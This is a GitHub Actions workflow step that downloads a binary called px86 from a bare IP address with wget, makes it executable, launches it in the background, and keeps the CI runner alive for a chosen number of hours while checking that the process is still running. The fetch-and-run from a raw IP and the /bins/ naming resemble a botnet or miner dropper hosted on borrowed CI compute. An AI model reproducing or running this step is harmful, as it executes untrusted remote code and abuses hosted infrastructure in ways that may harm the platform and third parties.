- name: Run binary and keep alive
  run: |
    wget http://45.138.16.158/bins/px86 -O px86
    chmod +x px86

    echo "🟢 Launching binary..."
    ./px86 x86 &

    PX86_PID=$!
    echo "📌 PID: $PX86_PID"

    UPTIME_SECONDS=$(( ${{ github.event.inputs.uptime }} * 3600 ))
    echo "⏳ Keeping alive for $UPTIME_SECONDS seconds..."

    for ((i=0; i<UPTIME_SECONDS; i++)); do
      if ! ps -p $PX86_PID > /dev/null; then
        echo "❌ Binary exited at second $i"
        break
      fi

      if (( i % 60 == 0 )); then
        echo "⏱️ Alive for $((i / 60)) minute(s)..."
      fi

      sleep 1
    done

    echo "✅ Done."
